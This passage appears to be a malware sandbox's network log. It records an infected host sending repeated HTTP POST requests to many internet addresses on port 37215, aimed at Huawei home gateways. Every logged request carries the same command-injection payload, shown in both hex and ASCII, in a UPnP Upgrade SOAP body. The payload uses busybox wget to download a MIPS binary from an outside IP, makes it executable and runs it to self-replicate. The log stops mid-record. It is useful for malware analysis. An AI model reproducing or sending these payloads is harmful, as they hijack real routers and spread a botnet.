2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1522192.168.2.134742441.105.156.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583966970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1523192.168.2.1343520157.45.146.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583990097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1524192.168.2.135098241.172.108.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.583997011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1525192.168.2.1341636157.235.240.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584023952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1526192.168.2.134420241.214.143.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584037066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1527192.168.2.1350654157.181.114.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584054947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1528192.168.2.1335466221.251.56.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584075928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1529192.168.2.1335216197.220.215.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584095955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1530192.168.2.1354972197.14.62.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584110022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1531192.168.2.1344760146.6.193.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584131956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1532192.168.2.1357816148.130.182.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.584148884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
